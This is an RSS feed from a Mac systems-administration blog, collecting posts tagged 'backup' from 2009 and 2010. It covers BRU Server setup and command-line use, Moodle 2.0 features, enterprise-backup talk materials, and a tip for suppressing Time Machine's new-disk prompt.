<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; backup</title>
	<atom:link href="http://krypted.com/tag/backup/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>BRU Primer -&gt; Advanced</title>
		<link>http://krypted.com/mac-os-x/bru-primer-advanced/</link>
		<comments>http://krypted.com/mac-os-x/bru-primer-advanced/#comments</comments>
		<pubDate>Wed, 09 Jun 2010 15:00:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[agent]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[BRU]]></category>
		<category><![CDATA[bru-server]]></category>
		<category><![CDATA[Command line]]></category>
		<category><![CDATA[config]]></category>
		<category><![CDATA[console]]></category>
		<category><![CDATA[kill]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[server]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=6043</guid>
		<description><![CDATA[In BRU 2, you have 3 tools to use. These include:

BRU Server Agent Config (UB) &#8211; A tool used to install the agent, which needs to be located on each machine that will be backed up (including the server if it has any data to back up)
BRU Server Config (UB) &#8211; Used to configure the [...]]]></description>
			<content:encoded><![CDATA[<p>In BRU 2, you have 3 tools to use. These include:</p>
<ul>
<li>BRU Server Agent Config (UB) &#8211; A tool used to install the agent, which needs to be located on each machine that will be backed up (including the server if it has any data to back up)</li>
<li>BRU Server Config (UB) &#8211; Used to configure the server daemon, backup server configurations and set passwords to communicate with the server. Also used to set licensing information and perform scans for new tape drives and libraries.</li>
<li>BRU Server Console (UB) &#8211; Used to configure backup jobs, schedules, etc.</li>
</ul>
<p>To get started, open the BRU Server Config application from the components that come with your software (or that you downloaded from the BRU website). First you will be asked to provide an administrative password to BRU. Provide the password and then click on Save.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.14.21-AM.png"><img class="aligncenter size-medium wp-image-6045" title="BRU Password" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.14.21-AM-300x138.png" alt="" width="300" height="138" /></a>Next, the server components will be copied to /usr/local/bru-server. The system will also perform a hardware scan of your server, looking for tape drives and libraries (you can always rerun this process later if need be).</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.14.42-AM.png"><img class="aligncenter size-medium wp-image-6046" title="BRU hardware scan" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.14.42-AM-300x186.png" alt="" width="300" height="186" /></a>Once the processes are complete the BRU Server Configuration Tool will open and you can configure the server. To do so, first click Start to start the daemon. If you need to restart it at a later date you can simply click on the Stop or Restart buttons here. Then, if like most, you would like for the server to start at boot, check the box for Server daemon starts at boot. Here, you can also use the Backup and Restore buttons to backup and restore server configurations or the Modify button to enter a new password for the server.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.15.08-AM.png"><img class="aligncenter size-medium wp-image-6047" title="BRU Server Config" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.15.08-AM-300x240.png" alt="" width="300" height="240" /></a>You can also perform most of these options from the command line using the server command located in /usr/local/bru-server. For example, to stop the server, you would use the &#8211;kill option:</p>
<blockquote><p>/usr/local/bru-server/server &#8211;kill</p></blockquote>
<p>To then start the server, run it with no arguments:</p>
<blockquote><p>/usr/local/bru-server/server</p></blockquote>
<p>Or to set the password, you would use (go figure) the &#8211;password option:</p>
<blockquote><p>/usr/local/bru-server/server &#8211;password</p></blockquote>
<p>You can also perform some options not exposed in the Configuration Tool GUI, such as running it on a custom port using the &#8211;port option followed by the port number:</p>
<blockquote><p>/usr/local/bru-server/server &#8211;port=8090</p></blockquote>
<p>Finally, you can check the version and license information using the &#8211;version and &#8211;license options respectively.</p>
<p>Once you are satisfied with your configuration of the server component, you will then close the tool and move on to installing the Agent(s). Each machine that will get backed up will need an agent installed. Configure the options for the BRU Agent using the BRU Server Agent Config application. Simply open the application from your installer. On first open, the agent will copy /usr/local/bru-server to your machine (if you installed the server it will just copy the agent portions of BRU), which will contain the agent. You will also then see a b icon in the menu bar. Click on the b icon in the menu bar and then click on Agent Configuration to bring up a screen similar to the following.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.04.43-AM.png"><img class="aligncenter size-medium wp-image-6044" title="BRU Agent Configuration" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.04.43-AM-300x210.png" alt="" width="300" height="210" /></a></p>
<p>Here, click on the Start button to configure the agent. You will typically want the agent to start automatically when you install a system, so click on the check box for Agent daemon starts automatically. You will then need to provide a server that the agent can communicate with. To do so, click on the plus sign (+) on the screen and then provide the server that the agent can communicate with and the credentials to do so. Once complete, you will then be able to see the client system in the Server Console.</p>
<p>You can also configure it from the command line, fairly easily. To do so, run the agent, located in /usr/local/bru-server, along with the &#8211;config option:</p>
<blockquote><p>/usr/local/bru-server/agent &#8211;config</p></blockquote>
<p>The BRU Server Agent Configuration will then enter into the interactive mode and you will see any BRU Server Console&#8217;s that the agent is configured to communicate with. Here, type N and then you will be prompted for the hostname of your BRU Server. Here, provide the  name or an IP address for the server and then hit the enter key. When prompted, provide a password to enter into the Console. The server will then be assigned a unique number. Entering that at the interactive prompt will then remove the server again. Once the agent has been started, it can be stopped by running the agent command with the &#8211;kill option:</p>
<blockquote><p>/usr/local/bru-server &#8211;kill</p></blockquote>
<p><em>Note: For Windows, the configuration command line tool is located in C:\Program Files\BRU Server Agent Configuration.</em></p>
<p>Now that you have configured the agent and the server, it&#8217;s time to actually setup jobs and schedules. To get started, open the BRU Server Console application. The console components will then be copied into /usr/local/bru-server.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.36.39-AM.png"><img class="aligncenter size-medium wp-image-6048" title="BRU Server Console" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.36.39-AM-300x148.png" alt="" width="300" height="148" /></a>Click on OK and then the authenticate to the server.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.37.08-AM.png"><img class="aligncenter size-medium wp-image-6049" title="Bru Console Authentication" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.37.08-AM-300x182.png" alt="" width="300" height="182" /></a>Once you have logged in, you will see the console. If the installation of the agents went properly, you should see any that you have installed as well.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.39.34-AM.png"><img class="aligncenter size-medium wp-image-6050" title="BRU Server Console" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.39.34-AM-300x205.png" alt="" width="300" height="205" /></a>Disk-to-Disk backups in BRU are mostly considered a staging area, where data is stored while waiting to be shuttled to tape. To set the staging area, click on the BRU Server Console menu and then click on Preferences&#8230;</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.46.21-AM.png"><img class="aligncenter size-medium wp-image-6052" title="Setting the Staging Area in BRU" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.46.21-AM-300x287.png" alt="" width="300" height="287" /></a></p>
<p>In the Stage Path field, provide a path that the stage files will be stored in. You can also set the maximum age of the staging data and the number of jobs to be stored in the history. When you&#8217;re satisfied with your settings, click on the Save button.</p>
<p>Back at the Console screen, you will click on the plus sign (+) to add a new backup job, which will bring up the screen you see here.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.42.47-AM.png"><img class="aligncenter size-medium wp-image-6051" title="Backup Job" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.42.47-AM-300x267.png" alt="" width="300" height="267" /></a></p>
<p>The backup job will include the following options:</p>
<ul>
<li>Job name: A name for the job.</li>
<li>Destination: Where the backup will be written to. You can use Stage Disk or choose a tape drive/library.</li>
<li>Backup Type: Your first job will need to be a full, subsequent jobs can be incremental or differential, which will require you to set a full job that you have created as the &#8220;Base Job&#8221;. An incremental will backup files that have been altered since the last incremental or full backup. A differential will backup all files altered since the last full, even if they were already backed up. Differentials will lead to faster restore times as you near the end of a backup cycle; however, they will usually take up considerably more space.</li>
<li>Base Job: The full backup job to base a differential or incremental backup job on.</li>
<li>Compression: Whether or not the software will attempt to compress data. Enabling compression causes slower backups, but takes up less space.</li>
<li>Email: An address to send backup reports to for the given job.</li>
<li>Verify Backup: Performs a scan of backed up files to ensure they match the source. This will take longer than if you do not enable it but provides peace of mind/assurance/etc.</li>
<li>Eject Tape after job completes: Only used if you are using tape, usually not used if you are using tape libraries.</li>
<li>Enable archive encryption: Encrypts archives <img src='http://krypted.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
</ul>
<p>Once you have configured a job as you see fit, click on OK and you will be taken back to the BRU Server Console screen. For each job you will still need to configure a schedule for the job as well as what source directories/files to be backed up. To set the schedule, click on the job name to be scheduled and then click on the Schedule&#8230; button. At the Job Scheduler screen, set the frequency and starting times that your job should run at and then click on the Save button.</p>
<p><a href="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.56.58-AM.png"><img class="aligncenter size-medium wp-image-6053" title="BRU Job Scheduler" src="http://krypted.com/wp-content/uploads/2010/06/Screen-shot-2010-06-09-at-12.56.58-AM-300x186.png" alt="" width="300" height="186" /></a>You will then need to configure the source directories for your backups. Back at the Console screen, click on the name of the job and then click on each directory to be backed up. Clicking on a directory will cycle through color codes. The colors indicate whether or not the directory will be backed up:</p>
<ul>
<li>yellow indicates that part of a directory will be backed up</li>
<li>green indicates the entire directory will be backed up</li>
<li>red indicates that a directory will explicitly be skipped</li>
</ul>
<p>When you are satisfied with your backup job, click Save. You will then configure an incremental or differential job for each base job and finally a job that is specifically for upstaging data to tape, or completing the disk-to-disk-to-tape sequence. When you are finished configuring each of your jobs you can run them manually to test by clicking on the Run Now while the job is selected from the console. When running, you can monitor each job using the Tools icon in the side bar and then the Job Monitor option in the Tools drop-down menu. To stop a job that is running, you can click on the Kill command here.</p>
<p>You can also run jobs from the command line, using the backup option for the bru-server.cmd command located in /usr/local/bru-server. The command can be run using the -j option (name of job), followed by the name of the job to be run, followed by the -t option (type of job), followed by the type of job being run (ie &#8211; Full, Incremental or Differental), followed by -Z (enable compression) and -v (enable verification), followed by the paths (starting with server names) to be backed up in brackets. For example, to run our test job:</p>
<blockquote><p>backup -j &#8220;test&#8221; -t &#8220;Full&#8221; -Z -v ["/krypted//Volumes/Installers"]</p></blockquote>
<p>This allows you to somewhat seamlessly integrate the backup of files that are archived with Final Cut Server, by calling up the backup command as a post-flight action for any automations kicked off by Final Cut Server. You can also backup data using the bru-server.cmd command in /usr/local/bru-server. You can then restore files that are backed up using the bru-server.cmd command&#8217;s restore option. In order to use the restore option, you&#8217;ll need to know which archive the file is stored in. In order to find that you will also need to script the search option (search for the appropriate file and then craft your restore to pull data back to the restore path for fcsvr_client using the correct archive that the file is stored on). To search through the archives for the appropriate file:</p>
<blockquote><p>search &#8220;my file.mov&#8221;</p></blockquote>
<p>You can also provide archives as part of the search, but we likely wouldn&#8217;t be searching here if we knew which ones to use.</p>
<p><em>Note: The BRU commands are based on python. When the python environment on a machine has been customized the results for BRU can be unexpected.</em><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/backup-exec-for-mac-os-x/" rel="bookmark" title="June 10, 2009">Backup Exec for Mac OS X</a></li>
<li><a href="http://krypted.com/business/cage-match-retrospect-vs-bru/" rel="bookmark" title="September 13, 2006">Cage Match: Retrospect vs. BRU</a></li>
<li><a href="http://krypted.com/final-cut-server/archive-restore-assets-with-fcsvr_client/" rel="bookmark" title="June 7, 2010">Archive &#038; Restore Assets with fcsvr_client</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-trusted-binding/" rel="bookmark" title="September 29, 2007">Mac OS X: Trusted Binding</a></li>
<li><a href="http://krypted.com/mac-os-x-server/howto-install-awstats-on-os-x/" rel="bookmark" title="February 3, 2006">Howto Install awstats on OS X</a></li>
</ul>
<p><!-- Similar Posts took 9.427 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/bru-primer-advanced/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Moodle 2.0</title>
		<link>http://krypted.com/mac-os-x/moodle-2-0/</link>
		<comments>http://krypted.com/mac-os-x/moodle-2-0/#comments</comments>
		<pubDate>Fri, 30 Oct 2009 01:19:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[sites]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[moodle]]></category>
		<category><![CDATA[moodle 2.0]]></category>
		<category><![CDATA[wiki]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4947</guid>
		<description><![CDATA[I&#8217;ve been experimenting with some of the new developmental stuff in Moodle 2.0. The first thing that struck me was that the navigation is much better. It&#8217;s uniform throughout the pages and it seems like a lot of attention was made to make the menus and how blocks appear and are laid out look and [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been experimenting with some of the new developmental stuff in Moodle 2.0. The first thing that struck me was that the navigation is much better. It&#8217;s uniform throughout the pages and it seems like a lot of attention was made to make the menus and how blocks appear and are laid out look and feel much better. There are also a number of new features for managing courses and blocks, including:</p>
<ul>
<li>Tagging</li>
<li>Built-in Progress tracking</li>
<li>Forced paths through a course</li>
<li>Conditional course completion</li>
<li>Enhanced testing and grading systems</li>
<li>Built-in RSS aggregation</li>
<li>Built-in blogging tool</li>
<li>A backup program that was actually able to backup my whole Moodle environment</li>
<li>Updated wiki engine that looks and feels much better</li>
</ul>
<p>Oh, and you can flag questions&#8230; Not sure what I think of that one though. Anyway, just some initial thoughts. Moodle 2.0 won&#8217;t be out until the end of the year, but if you go ahead and start regression testing it, you might be able to do an upgrade over the summer!<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x-server/moodle-security/" rel="bookmark" title="February 9, 2009">Moodle Security</a></li>
<li><a href="http://krypted.com/consulting/moodle/" rel="bookmark" title="January 12, 2008">Moodle</a></li>
<li><a href="http://krypted.com/mac-os-x-server/customizing-the-wiki-banner/" rel="bookmark" title="July 20, 2010">Customizing the Wiki Banner</a></li>
<li><a href="http://krypted.com/mac-os-x-server/mac-os-x-server-105-introduction-to-wiki/" rel="bookmark" title="November 26, 2007">Mac OS X Server 10.5: Introduction To Wiki</a></li>
<li><a href="http://krypted.com/sites/new-california-missions-website/" rel="bookmark" title="April 9, 2007">New California Missions Website</a></li>
</ul>
<p><!-- Similar Posts took 10.218 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/moodle-2-0/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Slides from MacSysAdmin Talk on Enterprise Backup</title>
		<link>http://krypted.com/mac-os-x/slides-from-macsysadmin-talk-on-enterprise-backup/</link>
		<comments>http://krypted.com/mac-os-x/slides-from-macsysadmin-talk-on-enterprise-backup/#comments</comments>
		<pubDate>Tue, 22 Sep 2009 14:45:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[enterprise backup]]></category>
		<category><![CDATA[MacSysAdmin]]></category>
		<category><![CDATA[slides]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4705</guid>
		<description><![CDATA[In case you were unable to make it to Sweden for the talk, here are the slides from the MacSysAdmin talk on Enterprise Backup. Hope the format suits ya&#8217;. If not, ummm&#8230; Sorry &#8211; or not&#8230;Similar Articles:

Speaking at MacSysAdmin 2009 in Sweden
MacSysAdmin
Backup Planning
MacSysAdmin Videos
Mac Enterprise Backup Whitepaper


Copyright &#169; 2008 This feed is for personal, non-commercial [...]]]></description>
			<content:encoded><![CDATA[<p>In case you were unable to make it to Sweden for the talk, here are the s<a href="http://krypted.com/Scripts/EnterpriseBackup.mov">lides from the MacSysAdmin talk on Enterprise Backup</a>. Hope the format suits ya&#8217;. If not, ummm&#8230; Sorry &#8211; or not&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/speaking-at-macsysadmin-2009-in-sweden/" rel="bookmark" title="August 23, 2009">Speaking at MacSysAdmin 2009 in Sweden</a></li>
<li><a href="http://krypted.com/mac-os-x/macsysadmin/" rel="bookmark" title="June 11, 2010">MacSysAdmin</a></li>
<li><a href="http://krypted.com/business/backup-planning/" rel="bookmark" title="September 18, 2009">Backup Planning</a></li>
<li><a href="http://krypted.com/mac-os-x/macsysadmin-videos/" rel="bookmark" title="September 25, 2009">MacSysAdmin Videos</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-enterprise-backup-whitepaper/" rel="bookmark" title="April 5, 2009">Mac Enterprise Backup Whitepaper</a></li>
</ul>
<p><!-- Similar Posts took 6.360 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/slides-from-macsysadmin-talk-on-enterprise-backup/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://krypted.com/Scripts/EnterpriseBackup.mov" length="1996051" type="video/quicktime" />
<enclosure url="http://krypted.com/Scripts/EnterpriseBackup.mov" length="1996051" type="video/quicktime" />
		</item>
		<item>
		<title>Backup Planning</title>
		<link>http://krypted.com/business/backup-planning/</link>
		<comments>http://krypted.com/business/backup-planning/#comments</comments>
		<pubDate>Fri, 18 Sep 2009 08:00:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Consulting]]></category>
		<category><![CDATA[Kerio]]></category>
		<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[Mass Deployment]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[backup calculator]]></category>
		<category><![CDATA[backup checklist]]></category>
		<category><![CDATA[enterprise backup]]></category>
		<category><![CDATA[sample]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4689</guid>
		<description><![CDATA[The two attached files are a sample checklist and a sample backup calculator to be used in conjunction with the talk I&#8217;m giving at MacSysAdmin, which has been moved up to 10:45 in the morning today.Similar Articles:

Slides from MacSysAdmin Talk on Enterprise Backup
Advanced Features of the Mac OS X Calculator
Xsan: Backup
TimeMachine Over Xsan and iSCSI
Mac [...]]]></description>
			<content:encoded><![CDATA[<p>The two attached files are <a href="http://www.krypted.com/Scripts/bak.zip">a sample checklist and a sample backup calculator</a> to be used in conjunction with the talk I&#8217;m giving at <a href="http://www.macsysadmin.se">MacSysAdmin</a>, which has been moved up to 10:45 in the morning today.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/slides-from-macsysadmin-talk-on-enterprise-backup/" rel="bookmark" title="September 22, 2009">Slides from MacSysAdmin Talk on Enterprise Backup</a></li>
<li><a href="http://krypted.com/mac-os-x/advanced-features-of-the-mac-os-x-calculator/" rel="bookmark" title="January 10, 2007">Advanced Features of the Mac OS X Calculator</a></li>
<li><a href="http://krypted.com/xsan/xsan-backup/" rel="bookmark" title="December 5, 2007">Xsan: Backup</a></li>
<li><a href="http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/" rel="bookmark" title="December 21, 2008">TimeMachine Over Xsan and iSCSI</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-invoke-a-command-w-screensaver/" rel="bookmark" title="October 28, 2009">Mac OS X: Invoke a Command w/ ScreenSaver</a></li>
</ul>
<p><!-- Similar Posts took 10.609 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/business/backup-planning/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Speaking at MacSysAdmin 2009 in Sweden</title>
		<link>http://krypted.com/mac-os-x/speaking-at-macsysadmin-2009-in-sweden/</link>
		<comments>http://krypted.com/mac-os-x/speaking-at-macsysadmin-2009-in-sweden/#comments</comments>
		<pubDate>Sun, 23 Aug 2009 17:07:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[public speaking]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[gotebord]]></category>
		<category><![CDATA[speaking]]></category>
		<category><![CDATA[sweden]]></category>
		<category><![CDATA[systems administration]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4510</guid>
		<description><![CDATA[MacSysAdmin 2009 will be held in the Burgårdens Konferenscenter in the center of Göteborg, Sweden.  I&#8217;ve just been added to the roster of speakers, effectively bringing down the average Knowledge of speakers by at least 1d6.  But I&#8217;ll try and keep ya&#8217; entertained at the least.  Hope you can make it and [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://macsysadmin.se">MacSysAdmin</a> 2009 will be held in the <a href="http://www.goteborg.se/wps/portal/!ut/p/c1/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gjU-9AJyMvYwN3jxBDAyNjT0sfdy9Pg1BvM6B8pFm8n79RqJuJp6GhhZkrUN7Mw8TJJ8zTwN3FmIBuP4_83FT9gtyIcgC-Ms6q/dl2/d1/L0lDU0lKSWdrbUEhIS9JRFJBQUlpQ2dBek15cXchL1lCSkoxTkExTkk1MC01RncvN18yNUtRQjJKMzBHSFQxMDIzSTlMR0pJMFVDMC9QX19fXzU!/?WCM_PORTLET=PC_7_25KQB2J30GHT1023I9LGJI0UC0_WCM&amp;WCM_GLOBAL_CONTEXT=/wps/wcm/connect/goteborg.se/goteborg_se/PolitikoOrganisation/Organisation/Enheter/Gymnasieskola/Burgarden/N610_lankrub_Externaverksamheter/art_N610_bug_konferens">Burgårdens Konferenscenter</a> in the center of Göteborg, Sweden.  I&#8217;ve just been added to the roster of speakers, effectively bringing down the average Knowledge of speakers by at least 1d6.  But I&#8217;ll try and keep ya&#8217; entertained at the least.  Hope you can make it and thanks to Tycho for the opportunity!<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/macsysadmin/" rel="bookmark" title="June 11, 2010">MacSysAdmin</a></li>
<li><a href="http://krypted.com/mac-os-x/slides-from-macsysadmin-talk-on-enterprise-backup/" rel="bookmark" title="September 22, 2009">Slides from MacSysAdmin Talk on Enterprise Backup</a></li>
<li><a href="http://krypted.com/mac-os-x/macsysadmin-videos/" rel="bookmark" title="September 25, 2009">MacSysAdmin Videos</a></li>
<li><a href="http://krypted.com/mac-os-x/shell-to-clipboard-back-again/" rel="bookmark" title="January 15, 2010">Shell to Clipboard &#038; Back Again</a></li>
<li><a href="http://krypted.com/mac-os-x/box-net-client-for-mac-os-x/" rel="bookmark" title="January 26, 2010">Box.net Client For Mac OS X</a></li>
</ul>
<p><!-- Similar Posts took 8.584 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/speaking-at-macsysadmin-2009-in-sweden/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Suppressing Time Machine on Disk Mount</title>
		<link>http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/</link>
		<comments>http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 17:00:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[annoying]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[defaults]]></category>
		<category><![CDATA[disk mount]]></category>
		<category><![CDATA[every time]]></category>
		<category><![CDATA[stop]]></category>
		<category><![CDATA[suppress]]></category>
		<category><![CDATA[Time Machine]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4046</guid>
		<description><![CDATA[By default, when you are using Time Machine in Mac OS X, every time you insert a drive the system will ask you if you would like to use that drive as a Time Machine backup destination. Â If you are like me and you swap drives around a lot then this can get annoying. Â So [...]]]></description>
			<content:encoded><![CDATA[<p>By default, when you are using Time Machine in Mac OS X, every time you insert a drive the system will ask you if you would like to use that drive as a Time Machine backup destination. Â If you are like me and you swap drives around a lot then this can get annoying. Â So to stop it you can actually just disable a launchd System Daemon, com.apple.backupd-attach. Â To do so, simply move theÂ /System/Library/LaunchDaemons/com.apple.backupd-attach.plist to another location and viola, on the next restart when you attach a disk Time Machine won&#8217;t ask you if you wish to add the disk to your Time Machine destinations.</p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">/System/Library/LaunchDaemons/com.apple.backupd-attach.plist</div>
<p>While this is one way, reader @Chealion pointed out on Twitter that the following command will go ahead and do the same thing without monkeying with launchd:</p>
<blockquote><p>defaults write /Library/Preferences/com.apple.TimeMachine DoNotOfferNewDisksForBackup -bool true;</p></blockquote>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/changing-time-machine-backup-frequency/" rel="bookmark" title="June 30, 2009">Changing Time Machine Backup Frequency</a></li>
<li><a href="http://krypted.com/mac-os-x/programatic-screen-sharing/" rel="bookmark" title="January 26, 2010">Programatic Screen Sharing</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-105-using-unsupported-disks-with-time-machine/" rel="bookmark" title="November 7, 2007">Mac OS X 10.5: Using Unsupported Disks with Time Machine</a></li>
<li><a href="http://krypted.com/mac-os-x/making-every-user-an-admin/" rel="bookmark" title="July 27, 2010">Making Every User an Admin</a></li>
<li><a href="http://krypted.com/mac-os-x/bru-primer-advanced/" rel="bookmark" title="June 9, 2010">BRU Primer -> Advanced</a></li>
</ul>
<p><!-- Similar Posts took 4.943 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/suppressing-time-machine-on-disk-mount/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mac Enterprise Backup Whitepaper</title>
		<link>http://krypted.com/mac-os-x/mac-enterprise-backup-whitepaper/</link>
		<comments>http://krypted.com/mac-os-x/mac-enterprise-backup-whitepaper/#comments</comments>
		<pubDate>Sun, 05 Apr 2009 14:59:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Atempo]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[bakbone]]></category>
		<category><![CDATA[BRU]]></category>
		<category><![CDATA[dhaliwal]]></category>
		<category><![CDATA[Enterprise]]></category>
		<category><![CDATA[Presstore]]></category>
		<category><![CDATA[Tivoli]]></category>
		<category><![CDATA[whitepaper]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=3464</guid>
		<description><![CDATA[The basic steps to use BRU, Tivoli, Atempo, Bakbone and PresSTORE are all covered in the latest edition of Michael Dhaliwal&#8217;s Enterprise Backup Whitepaper, available on his personal site.Similar Articles:

Slides from MacSysAdmin Talk on Enterprise Backup
Cage Match: Retrospect vs. BRU
Xsan: Backup
Good iPhone, Enterprise Ready
TimeMachine Over Xsan and iSCSI


